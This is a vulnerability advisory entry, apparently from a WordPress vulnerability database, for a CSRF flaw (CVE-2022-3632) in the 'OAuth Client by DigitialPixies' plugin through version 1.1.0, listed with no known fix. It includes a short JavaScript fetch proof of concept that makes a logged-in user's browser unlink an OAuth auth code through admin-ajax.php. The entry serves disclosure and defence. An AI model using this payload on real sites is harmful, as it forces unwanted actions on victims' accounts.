OAuth Client by DigitialPixies <= 1.1.0 – CSRF | CVE 2022-3632 | Plugin Vulnerabilities

Description

The plugin does not have CSRF checks in some places, which could allow attackers to make logged-in users perform unwanted actions.

Proof of Concept

Make a logged in user visit a page with the following code

fetch('https://example.com/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=dpt-oauth-ajax&call=unlink_auth_code',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

dpt-oauth-client

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

4c1b0e5e-245a-4d1f-a561-e91af906e62d

Timeline

Publicly Published

2022-10-21 (about 3 years ago)

Added

2022-10-21 (about 3 years ago)

Last Updated

2022-10-21 (about 3 years ago)

Other

Published

Title

Published

2025-01-20

Title

WP-BibTeX < 3.0.2 - Cross-Site Request Forgery to Stored and Reflected Cross-Site Scripting

Published

2025-02-13

Title

Simple Responsive Menu <= 2.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-12-15

Title

Simple Link Directory < 8.8.4 - Cross-Site Request Forgery

Published

2024-11-13

Title

wp-login customizer <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2024-07-23

Title

Social Auto Poster < 5.3.15 - Cross-Site Request Forgery via Multiple Functions